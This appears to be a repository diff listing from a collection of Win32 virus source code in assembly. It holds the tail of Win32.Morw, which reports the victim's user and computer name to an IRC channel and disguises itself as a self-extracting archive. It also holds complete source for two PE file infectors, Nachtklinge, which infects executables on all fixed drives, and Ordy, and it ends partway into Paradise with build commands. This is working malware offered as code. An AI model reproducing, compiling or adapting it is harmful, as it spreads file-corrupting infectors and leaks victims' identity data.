mov word [SockAddr_Port], ax
invoke connect,\
dword [SocketDesc],\
SockAddr,\
16d
cmp eax, 0
jne PayloadReturn
invoke lstrcpy,\
LineBuff,\
"NICK "
invoke lstrcat,\
LineBuff,\
Nick
call SendLine
invoke lstrcpy,\
LineBuff,\
"USER "
invoke lstrcat,\
LineBuff,\
Nick
invoke lstrcat,\
LineBuff,\
" 8 * :"
invoke lstrcat,\
LineBuff,\
Nick
invoke lstrcat,\
LineBuff,\
" "
invoke lstrcat,\
LineBuff,\
Nick
call SendLine
GetMotd:
call RecvLine
call HandlePing
mov ecx, 0
IsMotd:
cmp dword [LineBuff + ecx], "MOTD"
je HaveMotd
cmp byte [LineBuff + ecx], 0d
je LineEnd
inc ecx
jmp IsMotd
LineEnd:
jmp GetMotd
HaveMotd:
invoke lstrcpy, LineBuff,\
"JOIN #vx-lab"
call SendLine
invoke Sleep,\
1000d
invoke lstrcpy,\
LineBuff,\
"PRIVMSG #vx-lab :Win32.Morw got "
invoke lstrcat,\
LineBuff,\
UserName
invoke lstrcat,\
LineBuff,\
" on "
invoke lstrcat,\
LineBuff,\
CompName
call SendLine
invoke lstrcpy,\
LineBuff,\
"QUIT"
call SendLine
PayloadReturn:
ret
RecvLine:
invoke lstrcpy,\
LineBuff,\
""
GetLine:
invoke recv,\
dword [SocketDesc],\
CharBuff,\
1d,\
0
cmp eax, 0
je PayloadReturn
cmp byte [CharBuff], 10d
je HaveLine
invoke lstrcat,\
LineBuff,\
CharBuff
jmp GetLine
HaveLine:
ret
SendLine:
invoke lstrcat,\
LineBuff,\
CRLF
invoke lstrlen,\
LineBuff
invoke send,\
dword [SocketDesc],\
LineBuff,\
eax,\
0
cmp eax, -1
je PayloadReturn
ret
HandlePing:
cmp dword [LineBuff], "PING"
jne NoPing
invoke lstrcpy,\
PongBuff,\
LineBuff + 6d
invoke lstrcpy,\
LineBuff,\
Pong
call SendLine
NoPing:
ret
section "i" import data readable writeable
;==============================================
library kernel32, "kernel32.dll",\
advapi32, "advapi32.dll",\
user32, "user32.dll",\
winsock, "ws2_32.dll"
import kernel32,\
lstrlen, "lstrlenA",\
lstrcpy, "lstrcpyA",\
lstrcat, "lstrcatA",\
lstrcpyn, "lstrcpynA",\
GetModuleFileName, "GetModuleFileNameA",\
GetSystemDirectory, "GetSystemDirectoryA",\
CopyFile, "CopyFileA",\
CreateFileMapping, "CreateFileMappingA",\
MapViewOfFile, "MapViewOfFile",\
UnmapViewOfFile, "UnmapViewOfFile",\
CloseHandle, "CloseHandle",\
CreateProcess, "CreateProcessA",\
Sleep, "Sleep",\
SetFileAttributes, "SetFileAttributesA",\
CreateFile, "CreateFileA",\
DeleteFile, "DeleteFileA",\
WriteFile, "WriteFile",\
GetComputerName, "GetComputerNameA",\
GetSystemTime, "GetSystemTime",\
ExitProcess, "ExitProcess"
import advapi32,\
RegOpenKeyEx, "RegOpenKeyExA",\
RegCreateKey, "RegCreateKeyA",\
RegSetValueEx, "RegSetValueExA",\
RegQueryValueEx, "RegQueryValueExA",\
RegCloseKey, "RegCloseKey",\
GetUserName, "GetUserNameA"
import user32,\
MessageBox, "MessageBoxA",\
FindWindow, "FindWindowA",\
SendMessage, "SendMessageA",\
CharLowerBuff, "CharLowerBuffA"
import winsock,\
WSAStartup, "WSAStartup",\
socket, "socket",\
inet_addr, "inet_addr",\
htons, "htons",\
connect, "connect",\
recv, "recv",\
send, "send"
section "r" resource data readable
;=====================================
directory RT_ICON, icons,\
RT_GROUP_ICON, group_icons,\
RT_VERSION, versions
resource icons,\
1,\
LANG_NEUTRAL,\
icon_data
resource group_icons,\
17,\
LANG_NEUTRAL,\
main_icon
resource versions,\
1,\
LANG_NEUTRAL,\
version
icon main_icon,\
icon_data,\
"Morw.ico"
versioninfo version,\
VOS__WINDOWS32, VFT_APP, VFT2_UNKNOWN, LANG_ENGLISH, 0,\
"FileDescription", "Self Extracting Archive",\
"LegalCopyright", "RRLF Compressing Inc.",\
"FileVersion", "1.0",\
"ProductVersion", "1.0",\
"OriginalFilename", "Archive.ZIP"
Win32/Infector/Win32.Mutt.asm
+1307
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Nachtklinge.asm
+694
View File
@@ -0,0 +1,694 @@
;
; Name: Win32.Nachtklinge
;
; Type: Runtime PE-Infector
;
; Coder: BeLiAL/bcvg
;
; Comment: - Eats HD-space (when win32.nachtklinge finds a file which is
; already infected or not infectable, the filesize will increased (60kb))
; - Infects first 50 files on all HDs in all dirs !!
; - Nachtklinge has a bug, it crashes on some files, but
; i dunno wether it was my fault or the coder of the file
; was cleverer than i was ;)
;
; Greetings: Greetings go out to the whole BlackCat group, espacially to Dr_T and
; SatanicC0der
; also a "hello" to toro, Sinist3r and cwarrior alias daniel'
;
; One important thing: Puppet on Undernet (#winnuke) is totally lame (he is the coder of
; NukeNabber). When u see him, give him greetings from me and
; congratulate him to his amazing coding skills.
;
;
; BeLiAL 2001
; http://home.foni.net/~belial
;
;
;
; Schwarz verbreitet sich in meinem Kopf
; ganz aufgequollen, mein Augenlicht zersetzt,
; das Herz verbrennt im weißen Nichts,
; und doch es wird...
.386
.model flat
Extrn ExitProcess:Proc
virussize EQU offset virusend - offset start
MAX_PATH EQU 260
DIR_ATTRIB EQU 10h
DRIVE_FIXED EQU 3h
.data
db 0
.code
start:
call deltastuff
deltastuff:
pop ebp
sub ebp,offset deltastuff
mov eax,dword ptr [ebp+old_entry]
mov dword ptr [ebp+old_entry_save],eax
call locate_kernel ;copies kernel address to eax
mov dword ptr [ebp+kerneloffset],eax
call get_export_table ;expects kernel address in eax
lea eax,[ebp+offset LoadLibrary]
call get_kernel_api ;find an API in kernel
lea eax,[ebp+offset GetProcAddress]
call get_kernel_api
call get_apis
mov byte ptr [ebp+infection_counter],0
pop eax
push eax
mov dword ptr [ebp+stackshit],eax
lea eax,[ebp+offset directorybuffer]
push eax
push 256
call [ebp+GetCurrentDirectory]
new_round:
lea eax,[ebp+offset thedrive]
push eax
call [ebp+SetCurrentDirectory]
cmp eax,0
je exit_routine
call InfectCurrentDir
findfirstdir:
lea eax,[ebp+FindFileData]
push eax
lea eax,[ebp+offset dirstring]
push eax
call [ebp+FindFirstFile]
mov dword ptr [ebp+dirhandle],eax
inc eax
jz go_one_down
cmp word ptr [ebp+FindFileData.cFileName],2e2eh
je findnextdir1
cmp word ptr [ebp+FindFileData.cFileName],002eh
je findnextdir1
cmp dword ptr [ebp+FindFileData.dwFileAttributes],DIR_ATTRIB
jne findnextdir1
push dword ptr [ebp+dirhandle]
lea eax,[ebp+offset FindFileData.cFileName]
push eax
call [ebp+SetCurrentDirectory]
call InfectCurrentDir
jmp findfirstdir
findnextdir1:
mov eax,dword ptr [ebp+dirhandle]
findnextdir:
lea ebx,[ebp+offset FindFileData]
push ebx
push eax
call [ebp+FindNextFile]
test eax,eax
jz go_one_down
cmp word ptr [ebp+FindFileData.cFileName],2e2eh
je findnextdir1
cmp word ptr [ebp+FindFileData.cFileName],2e00h
je findnextdir1
cmp word ptr [FindFileData.cFileName],002eh
je findnextdir1
cmp dword ptr [ebp+FindFileData.dwFileAttributes],DIR_ATTRIB
jne findnextdir1
push dword ptr [ebp+dirhandle]
lea eax,[ebp+offset FindFileData.cFileName]
push eax
call [ebp+SetCurrentDirectory]
call InfectCurrentDir
jmp findfirstdir
exit_routine:
add byte ptr [ebp+thedrive],1
lea eax,[ebp+offset thedrive]
push eax
call [ebp+GetDriveType]
cmp eax,DRIVE_FIXED
je new_round
lea eax,[ebp+offset directorybuffer]
push eax
call [ebp+SetCurrentDirectory]
jmp return_host
go_one_down:
lea eax,[ebp+offset dotdot]
push eax
call [ebp+SetCurrentDirectory]
push dword ptr [ebp+dirhandle]
call [ebp+FindClose]
pop eax
mov dword ptr [ebp+dirhandle],eax
mov ebx,dword ptr [ebp+stackshit]
cmp eax,ebx
jne findnextdir1
push eax
jmp exit_routine
return_host:
cmp ebp,0
jne not1stgeneration
push 0
call ExitProcess
not1stgeneration:
mov eax,dword ptr [ebp+old_entry_save]
jmp eax
;------------------------------procedures----------------------------------------
locate_kernel proc
mov dword ptr [ebp+stack_buffer],ebx
pop ebx
pop eax
push eax
push ebx
mov ax,0000h
is_this_mz:
cmp word ptr [eax],'ZM'
je found_mz
sub eax,10000h
jmp is_this_mz
found_mz:
mov ebx,dword ptr [ebp+stack_buffer]
ret
stack_buffer dd 0
endp
get_export_table proc
pushad
mov ebx,dword ptr [eax+3ch]
add eax,ebx
cmp word ptr [eax],'EP'
jne prepare_for_jumping_back
mov esi,dword ptr [eax+78h] ;go to exporttable
add esi,dword ptr [ebp+kerneloffset]
add esi,1ch
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kerneloffset] ;Offset of RVA of the function_names_table
mov [ebp+dword ptr Api_Adress_Table],eax
add esi,4
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kerneloffset] ;Offset of RVA of the function_names_table
mov [ebp+dword ptr Api_Name_Table],eax
add esi,4
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kerneloffset] ;Offset of RVA of the function_names_table
mov [ebp+dword ptr Api_Ordinary_Table],eax
popad
ret
prepare_for_jumping_back:
popad
pop eax
jmp return_host
endp
get_kernel_api proc
pushad
push eax
add eax,4
call get_string_lenght
mov dword ptr [ebp+Current_API_Lenght],eax
pop eax
mov ebx,dword ptr [ebp+Api_Name_Table]
mov edx,0
string_find_loop:
mov ecx,dword ptr [ebp+Current_API_Lenght]
lea esi,[eax+4]
mov edi,dword ptr [ebx]
add edi,dword ptr [ebp+kerneloffset]
rep cmpsb
je found_API_string
add edx,1
add ebx,4
jmp string_find_loop
found_API_string:
shl edx,1
add edx,dword ptr [ebp+Api_Ordinary_Table]
mov ebx,0
mov bx,word ptr [edx]
shl bx,2
add ebx,dword ptr [ebp+Api_Adress_Table]
mov edx,dword ptr [ebx]
add edx,dword ptr [ebp+kerneloffset]
mov dword ptr [eax],edx
popad
ret
endp
get_string_lenght proc ;offset of string in eax
push ecx
mov ecx,0
find_the_end_again:
cmp byte ptr [eax],00h
je found_lenght
inc ecx
inc eax
jmp find_the_end_again
found_lenght:
mov eax,ecx
pop ecx
ret
endp
get_apis proc
pushad
lea eax,[ebp+offset kernel32]
push eax
call [ebp+LoadLibrary]
mov dword ptr [ebp+kernelmodulhandle],eax
mov ebx,eax
lea edx,[ebp+offset CreateFile]
find_the_next_one:
push edx
push ebx
add edx,4
push edx
push ebx
call [ebp+GetProcAddress]
pop ebx
pop edx
mov dword ptr [edx],eax
cmp eax,0
je prepare_for_jumping_back
add edx,4
mov eax,edx
call get_string_lenght
add edx,eax
inc edx
cmp byte ptr [edx],'e'
je found_them_all
jmp find_the_next_one
found_them_all:
popad
ret
endp
InfectCurrentDir proc
pushad
findfirstfile:
lea eax,[ebp+offset FindFileData]
push eax
lea eax,[ebp+offset exestring]
push eax
call [ebp+FindFirstFile]
mov dword ptr [ebp+findfilehandle],eax
inc eax
jz no_files_left
jmp infect_the_file
find_next_file:
lea eax,[ebp+offset FindFileData]
push eax
push dword ptr [ebp+findfilehandle]
call [ebp+FindNextFile]
test eax,eax
jz no_files_left
infect_the_file:
push 0
push 0
push 3
push 0
push 1
push 80000000h + 40000000h
lea eax,[ebp+offset FindFileData.cFileName]
push eax
call [ebp+CreateFile]
cmp eax,0ffffffffh
je find_next_file
mov dword ptr [ebp+filehandle],eax
lea eax,[ebp+offset lastwrite]
push eax
lea eax,[ebp+offset lastaccess]
push eax
lea eax,[ebp+offset creationtime]
push eax
push dword ptr [ebp+filehandle]
call [ebp+GetFileTime]
push 0
push dword ptr [ebp+filehandle]
call [ebp+GetFileSize]
mov dword ptr [ebp+filesize],eax
add eax,virussize
push eax
push 0
push eax
push 0
push 4
push 0
push dword ptr [ebp+filehandle]
call [ebp+CreateFileMapping]
mov dword ptr [ebp+filemaphandle],eax
pop ebx ;not silly, just a personal note
push ebx
push 0
push 0
push 2
push eax
call [ebp+MapViewOfFile]
mov dword ptr [ebp+filemapaddress],eax
;The infection starts here!!!!!!!
cmp word ptr [eax+38h],';;'
je make_file_bigger
mov word ptr [eax+38h],';;'
mov ebx,dword ptr [eax+3ch]
add eax,ebx
cmp word ptr [eax],'EP'
jne close_handles
mov ebx,dword ptr [eax+28h] ;file entry point
add ebx,dword ptr [eax+34h] ;+image base
mov dword ptr [ebp+old_entry],ebx ;=old entry point ;)
mov ebx,dword ptr [eax+3ch]
mov dword ptr [ebp+file_alignment],ebx
xor edx,edx
mov dx,word ptr [eax+14h] ;size of optional_header
add edx,eax
add edx,18h ;size of image_header
;the section-headers begin in edx
push eax
push edx
;number of sections = eax+6h
mov cx,word ptr [eax+6h]
mov ax,cx ;nr of sections in ax
dec ax ;first section is section number 0
xor ecx,ecx
mov word ptr [ebp+section_counter],0
find_last_section:
mov ebx,dword ptr [edx+14h]
cmp ebx,ecx
jz not_bigger
section_bigger:
mov si,word ptr [ebp+section_counter]
not_bigger:
cmp ax,word ptr [ebp+section_counter]
je found_last_section
add word ptr [ebp+section_counter],1
mov ecx,dword ptr [edx+14h]
add edx,28h
jmp find_last_section
found_last_section:
mov eax,28h
xor ecx,ecx
mov cx,si
mul ecx
pop edx
add edx,eax
pop eax ;eax=offset PE edx=offset last section header
or dword ptr [edx+24h],00000020h
or dword ptr [edx+24h],20000000h
or dword ptr [edx+24h],80000000h ;changed the attributes of the last section
mov ebx,dword ptr [edx+8h]
mov dword ptr [ebp+old_section_size],ebx
add ebx,virussize
add dword ptr [edx+8h],ebx ;virtualsize is patched and saved
mov ebx,dword ptr [edx+10h]
mov dword ptr [ebp+old_raw_size],ebx
push eax
push edx
mov eax,dword ptr [edx+8h]
xor edx,edx
mov ebx,dword ptr [ebp+file_alignment]
div ebx
sub ebx,edx
pop edx
pop eax
mov ecx,dword ptr [edx+8h]
add ecx,ebx
mov dword ptr [edx+10h],ecx ;size of raw data patched and saved
mov ebx,dword ptr [edx+0ch]
add ebx,dword ptr [ebp+old_section_size]
mov dword ptr [eax+28h],ebx ;now we have a new entry point
mov ebx,dword ptr [edx+10h]
add ebx,dword ptr [ebp+old_raw_size]
add ebx,1000h
add dword ptr [eax+50h],ebx ;size_of_image is patched
mov ebx,dword ptr [edx+14h]
add ebx,dword ptr [ebp+old_section_size]
add ebx,dword ptr [ebp+filemapaddress]
mov edi,ebx
lea esi,[ebp+offset start]
mov ecx,virussize
rep movsb ;virus is at the end
add byte ptr [ebp+infection_counter],1
jmp close_handles
make_file_bigger:
push dword ptr [ebp+filemapaddress]
call [ebp+UnmapViewOfFile]
push dword ptr [ebp+filemaphandle]
call [ebp+CloseHandle]
mov eax,dword ptr [ebp+filesize]
add eax,0ffffh
push eax
push 0
push eax
push 0
push 4
push 0
push dword ptr [ebp+filehandle]
call [ebp+CreateFileMapping]
mov dword ptr [ebp+filemaphandle],eax
pop ebx ;saw it already anywhere else ? ;)
push ebx
push 0
push 0
push 2
push eax
call [ebp+MapViewOfFile]
mov dword ptr [ebp+filemapaddress],eax
close_handles:
push dword ptr [ebp+filemapaddress]
call [ebp+UnmapViewOfFile]
push dword ptr [ebp+filemaphandle]
call [ebp+CloseHandle]
lea eax,[ebp+offset lastwrite]
push eax
lea eax,[ebp+offset lastaccess]
push eax
lea eax,[ebp+offset creationtime]
push eax
push dword ptr [ebp+filehandle]
call [ebp+SetFileTime]
push dword ptr [ebp+filehandle]
call [ebp+CloseHandle]
cmp byte ptr [ebp+infection_counter],50
jne find_next_file
popad
clear_stack:
pop eax
cmp eax,dword ptr [ebp+stackshit]
jne clear_stack
jmp return_host
no_files_left:
push dword ptr [ebp+findfilehandle]
call [ebp+FindClose]
popad
ret
endp
;-----------------------------------variables----------------------------
kerneloffset dd 0
Api_Adress_Table dd 0
Api_Name_Table dd 0
Api_Ordinary_Table dd 0
Current_API_Lenght dd 0
LoadLibrary dd 0
LoadLibrary_ db "LoadLibraryA",0
GetProcAddress dd 0
GetProcAddress_ db "GetProcAddress",0
kernel32 db "kernel32.dll",0
kernelmodulhandle dd 0
CreateFile dd 0
CreateFile_ db "CreateFileA",0
CreateFileMapping dd 0
CreateFileMapping_ db "CreateFileMappingA",0
MapViewOfFile dd 0
MapViewOfFile_ db "MapViewOfFile",0
CloseHandle dd 0
CloseHandle_ db "CloseHandle",0
FindClose dd 0
FindClose_ db "FindClose",0
UnmapViewOfFile dd 0
UnmapViewOfFile_ db "UnmapViewOfFile",0
FindFirstFile dd 0
FindFirstFile_ db "FindFirstFileA",0
FindNextFile dd 0
FindNextFile_ db "FindNextFileA",0
GetFileSize dd 0
GetFileSize_ db "GetFileSize",0
GetFileTime dd 0
GetFileTime_ db "GetFileTime",0
SetFileTime dd 0
SetFileTime_ db "SetFileTime",0
GetCurrentDirectory dd 0
db "GetCurrentDirectoryA",0
SetCurrentDirectory dd 0
db "SetCurrentDirectoryA",0
GetDriveType dd 0
db "GetDriveTypeA",0
db "e"
findfilehandle dd 0
dirhandle dd 0
filehandle dd 0
filemaphandle dd 0
filemapaddress dd 0
exestring db "*.exe",0
dirstring db "*.*",0
filesize dd 0
old_entry dd 0
file_alignment dd 0
section_counter dw 0
old_section_size dd 0
old_raw_size dd 0
old_entry_save dd 0
db "Win9x.Nachtklinge coded by BeLiAL/bcvg"
stackshit dd 0
directorybuffer db 256 dup (1)
thedrive db "c:\",0
dotdot db "..",0
infection_counter db 0
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
lastwrite FILETIME <>
lastaccess FILETIME <>
creationtime FILETIME <>
db "Follow the Black Cat"
virusend label near
end start
Win32/Infector/Win32.Neo.asm
+1202
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Norther.ASM
+2420
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Omoikane.asm
+2123
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Orange.asm
+1037
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Ordy.asm
+428
View File
@@ -0,0 +1,428 @@
comment "
Win32.ordy by mort[MATRiX]
- simple direct action current dir last section PE appender
- using ordinal API values to access API
Well, in viriis there's mostly use some stuff to find APIs no matter
of kernel32.dll type,... I use APIs' ordinal values to access APIs.
API's address is counted right before it's used,...
When i searched for this values in different versions of widows,
i found they differ, so i included all ord values i was able to find.
U find them in ord.zip file in tools section.
I cant test thiss virii on all windoze versions. This one seems to be
good under win2k, anyway if u wanna run it under another, recheck
API's count,...
greetz All who helped me to create ordinal log
MiCr0s0fT - i founded my CreateFileA API DF sensitive,...
r there more? :)))
"
.486
.model flat,stdcall
extrn ExitProcess : proc
extrn MessageBoxA : proc
filetime struc
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
filetime ends
fileSearch struc
FileAttributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeLow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName db 0260h dup(?)
AlternateFileName db 13 dup(?)
db 3 dup(?)
fileSearch ends
_vSize = ((@retAdd - @ordy) / 0200h + 1) * 0200h
_DEBUG = 0
.data
dd ?
.code
@ordy:
mov eax,@retAdd - @ordy
push offset @retAdd
_retAddress equ $ - 4
pushad
call @SEH
add esp,8
mov esp,[esp]
pop dword ptr fs:[0]
pop eax
popad
ret
if _DEBUG
db 01000h dup(0) ;coz of debug symbols,...:(
endif
@SEH:
push dword ptr fs:[0]
mov dword ptr fs:[0],esp
xor eax,eax
call @findKernel
@delta label
mov ebp,[esp - 4] ;get delta handle
mov [ebp + _kBase - @delta],eax
mov ebx,eax ;get kernel values,...
add eax,dword ptr [eax + 03ch]
add eax,078h
mov eax,[eax]
add eax,ebx
add eax,018h
xchg eax,esi
lodsd
push eax
lodsd
add eax,ebx
mov [ebp + _addBase - @delta],eax
pop eax
lea edi,[ebp + _ordinals - @delta - (_ordEnd - _ordStart - 2)]
@nextOrdinal:
add edi,(_ordEnd - _ordStart) - 2
scasw
jnz @nextOrdinal
mov [ebp + _ordinalBase - @delta],edi
push 02000h
push 040h
mov eax,_GlobalAlloc
call @callAPI
push eax ;for GlobalFree
push eax
call @mask
db '*.*',0
@mask:
mov eax,_FindFirstFileA
call @callAPI
xchg eax,esi
@examine:
mov eax,[esp]
mov al,byte ptr [eax + FileAttributes]
and al,010h
cmp al,010h
jnz @fileFounded
@nextFile:
push dword ptr [esp]
push esi
mov eax,_FindNextFileA
call @callAPI
dec eax
jz @examine
mov eax,_GlobalFree
call @callAPI
xor eax,eax
sub eax,[esp + 030h] ;cause exception
@findKernel:
add eax,[esp + 030h]
and eax,0fffff000h
@nextPage:
sub eax,01000h
cmp word ptr [eax],'ZM'
jnz @nextPage
ret
;------------------------------------------------------------------------
@rw:
; edi - file handle
; eax - ReadFile/WriteFile
; edx - buffer
; ecx - size
pushad
push 0
call @fw
dd ?
@fw:
push ecx edx edi
call @callAPI
popad
ret
;------------------------------------------------------------------------
@fileFounded:
if _DEBUG
mov eax,[esp]
cmp dword ptr [eax + FileName],'SOHG'
jz @oki
jmp @nextFile
@oki:
endif
mov ebx,[esp]
mov eax,[ebx + FileSizeLow]
cmp eax,04000h
jb @nextFile
mov eax,dword ptr [ebx + FileName]
and dword ptr [ebx + LastWriteTime],eax
jz @nextFile
or dword ptr [ebx + LastWriteTime],eax
mov edx,_ReadFile
xchg eax,ebx
add eax,01000h
xchg eax,edx
call @openRW
push edx
push edi
mov eax,_CloseHandle
call @callAPI
pop edx
cld
mov edi,edx
mov eax,'EPZM'
scasw
jnz @nextFile
shr eax,010h
std
add edi,dword ptr [edi + 03ah]
scasw
scasw
jnz @nextFile
mov eax,[edi + 076h]
shl eax,3
add eax,052h
xchg eax,ebx
movzx eax,word ptr [edi + 8]
imul eax,028h
xadd ebx,eax
mov eax,_vSize
add [edi + 052h],eax ;add imagesize
xadd [ebx + edi + 010h],eax ;eax - old size
push eax
add eax,[ebx + edi + 014h] ;add phys. offset
mov [ebp + _virBodyPofs - @delta],eax
pop eax
add eax,[ebx + edi + 0ch]
xchg eax,[edi + 02ah] ;set/get entrypoint
add eax,[edi + 036h]
mov [ebp + _retAddress - @delta],eax ;set it,...
add dword ptr [ebx + edi + 08h],01000h ;add virtual size
or dword ptr [ebx + edi + 024h],0a0000020h
lea eax,[ebp + @finalInfection - @delta]
push eax
mov eax,_WriteFile
@openRW:
mov ecx,01000h
cld ;coz of CreateFileA DF sensitivity,...:)))
call @open
call @rw
ret
;------------------------------------------------------------------------
@setA:
push ebx
push eax
mov eax,_SetFileAttributesA
call @callAPI
ret
;-----------------------------------------------------------------------
_CloseHandle = 0 ;API handles
_CreateFileA = 2
_GlobalAlloc = 4
_GlobalFree = 6
_WriteFile = 8
_ReadFile = 0ah
_FindFirstFileA = 0ch
_FindNextFileA = 0eh
_SetEndOfFile = 010h
_SetFileTime = 012h
_SetFileAttributesA = 014h
_ordSize equ _ordEnd - _ordStart
;shl 2
_ordinals label
_ordStart label
_ordinals95 label
dw 0682 ;APIs num
dw 088h * 4 ;CloseHandle
dw 09dh * 4 ;CreateFileA
dw 01b5h * 4 ;GlobalAlloc
dw 01bch * 4 ;GlobalFree
dw 02e3h * 4 ;WriteFile
dw 0242h * 4 ;ReadFile
dw 0f9h * 4 ;FindFirstFileA
dw 0fch * 4 ;FindNextFile
dw 0281h * 4 ;SetEndOfFile
dw 028bh * 4 ;SetFileTime
dw 0288h * 4 ;SetFileAttributesA
_ordEnd label
_ordinals98 label ;(r1,SE)
dw 0745 ;APIs num
dw 09fh * 4 ;CloseHandle
dw 0b8h * 4 ;CreateFileA
dw 01e5h * 4 ;GlobalAlloc
dw 01ech * 4 ;GlobalFree
dw 0335h * 4 ;WriteFile
dw 027dh * 4 ;ReadFile
dw 011bh * 4 ;FindFirstFileA
dw 0120h * 4 ;FindNextFile
dw 02c5h * 4 ;SetEndOfFile
dw 02cfh * 4 ;SetFileTime
dw 02cch * 4 ;SetFileAttributesA
_ordinalsNT label
dw 02a1h ;APIs num
dw 018h * 4 ;CloseHandle
dw 031h * 4 ;CreateFileA
dw 0155h * 4 ;GlobalAlloc
dw 015ch * 4 ;GlobalFree
dw 027bh * 4 ;WriteFile
dw 01d6h * 4 ;ReadFile
dw 082h * 4 ;FindFirstFileA
dw 087h * 4 ;FindNextFile
dw 0210h * 4 ;SetEndOfFile
dw 021ah * 4 ;SetFileTime
dw 0217h * 4 ;SetFileAttributesA
_ordinals2k label
dw 0337h ;APIs num
dw 01eh * 4 ;CloseHandle
dw 037h * 4 ;CreateFileA
dw 019ch * 4 ;GlobalAlloc
dw 01a3h * 4 ;GlobalFree
dw 030eh * 4 ;WriteFile
dw 023dh * 4 ;ReadFile
dw 0a3h * 4 ;FindFirstFileA
dw 0ach * 4 ;FindNextFile
dw 028ch * 4 ;SetEndOfFile
dw 0297h * 4 ;SetFileTime
dw 0293h * 4 ;SetFileAttributesA
;------------------------------------------------------------------------
@open:
;eax - filename
pushad
mov eax,[esp + 028h]
add eax,FileName
push 0 0 3 0 1
push 080000000h or 040000000h
push eax
mov ebx,020h
call @setA
mov eax,_CreateFileA
call @callAPI
mov [esp],eax ;handle to edi
popad
ret
;-------------------------------------------------------
;eax - API handle
@callAPI:
pop edi
add eax,012345678h
_ordinalBase equ $ - 4
movzx eax,word ptr [eax]
add eax,012345678h
_addBase equ $ - 4
mov eax,[eax]
add eax,012345678h
_kBase equ $ - 4
call eax
jmp edi
;----------------------------------------------------------------
@finalInfection:
mov eax,012345678h
_virBodyPofs equ $ - 4
sub eax,01000h
push eax
mov eax,_ReadFile
xor ecx,ecx
inc ecx
@nextByte2Seek:
call @rw
dec dword ptr [esp]
jnz @nextByte2Seek
pop eax
mov ecx,_vSize
lea edx,[ebp + @ordy - @delta]
add eax,_WriteFile
call @rw
push esi
push edi edi
mov eax,_SetEndOfFile
call @callAPI
mov ebx,[esp]
mov eax,[esp + 0ch]
add eax,LastWriteTime
push eax
sub eax,8
push eax
sub eax,8
push eax
push ebx
mov eax,_SetFileTime
call @callAPI
mov eax,_CloseHandle
call @callAPI
mov ebx,[esp + 4]
mov eax,[ebx + FileAttributes]
xchg eax,ebx
add eax,FileName
call @setA
pop esi ;restore search handle
@fuckFile:
jmp @nextFile
@retAdd:
push 0
call @title
db '.ordy by mort[MATRiX]',0
@title:
call @mess
db 'hey guys, CreateFileA API is DF sensitive!!! :)))',0
@mess:
push 0
call MessageBoxA
call ExitProcess,0
ret
end @ordy
Win32/Infector/Win32.Paradise.asm
+823
View File
@@ -0,0 +1,823 @@
; [Win32.Paradise] - Bugfixed and improved version of Iced Earth
; Copyright (c) 1999 by Billy Belcebu/iKX
;
; ?????? Welcome to another Billy's production.
; ???? ??????? ??? Enjoy this new...
; ????????????????????
; ? ???????????????? ???
; ? ????????????? ?
; ??????? ?? ?????? ??? ??? ????? ??? ??? ?????? ??????
; ??????? ?? ?? ???? ? ??? ? ?? ?? ? ??? ? ??????? ???????
; ? ? ?? ? ? ??? ? ?? ?? ? ??? ? ??????? ??????? ???
; ?? ??????? ????? ??????? ??????? ??????? ???
; ?? ??? ??????? ??????? ??????? ??????? ?????? ????? ??????? ???????
; ??????????? ? ??? ? ? ??? ? ? ??? ? ? ??? ? ? ?? ?? ?? ?? ? ????? ? ?????
; ????? ?? ???? ? ????? ? ??? ? ? ? ??? ? ??? ? ? ??? ? ?? ?? ????? ? ? ?????
; ??? ??? ??? ??????? ??? ??? ??????? ????? ??????? ???????
;
; Virus Name : Paradise
; Virus Author : Billy Belcebu/iKX
; Origin : Spain
; Platform : Win32
; Target : PE files
; Compiling : TASM 5.0 and TLINK 5.0 should be used
; tasm32 /ml /m3 paradise,,;
; tlink32 /Tpe /aa /c /v paradise,paradise,,import32.lib,
; Notes : Not very innovative, just made for practice some things, as
; CRC32 GetAPI engine, and such like. The name comes from one
; of the best songs i've ever heard, and probably my favouri-
; te song of Stratovarius. Its lyrics are, sadly, an actual
; reality: we are killing the nature slowly and without any
; kind of mercy, thinking that we can make any use of every-
; thing around without any responsability...
; Greetings : It is very clear... to all the Stratovaius fans (specially
; to Int13h and Owl) and all the ecologist activists.
; Fucks : To everything related to the bullfights, the greatest act
; of the human barbarism with the animals, the spanish's
; national shame; and to all the acts that go againist the
; rights of the animals and/or the vegetables, as well as
; with the persons (goddamn fascisms!).
;
; Rojo, sangre
; un color muy nacional
; morbo, suerte
; sol y arena pide Dios
; arte, muerte
; sirve de alimento
; pase, valiente,
; y vuelta al ruedo!!!
; Cuando el acero me traspasa el corazon
; y se le llama fiesta
; y otra vuelta de tuerca
; cuando el sadismo se convierte en tradicion
; y la faena en gesta
; y nadie se molesta
; -Reincidentes-
;
.586p
.model flat
; ??----?????? ?
; : Paradise virus - Data, macros and such like shit :
; ? ??????---???
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
virus_size equ (offset virus_end-offset virus_start)
heap_size equ (offset heap_end-offset heap_start)
total_size equ virus_size+heap_size
shit_size equ (offset delta-offset Paradise)
section_flags equ 00000020h or 20000000h or 80000000h
temp_attributes equ 00000080h
n_infections equ 04h
mark equ 04Ch
; Only hardcoded for 1st generation, don't worry ;)
kernel_ equ 0BFF70000h
kernel_wNT equ 077F00000h
; Interesting macros for my code
cmp_ macro reg,joff1 ; Optimized version of
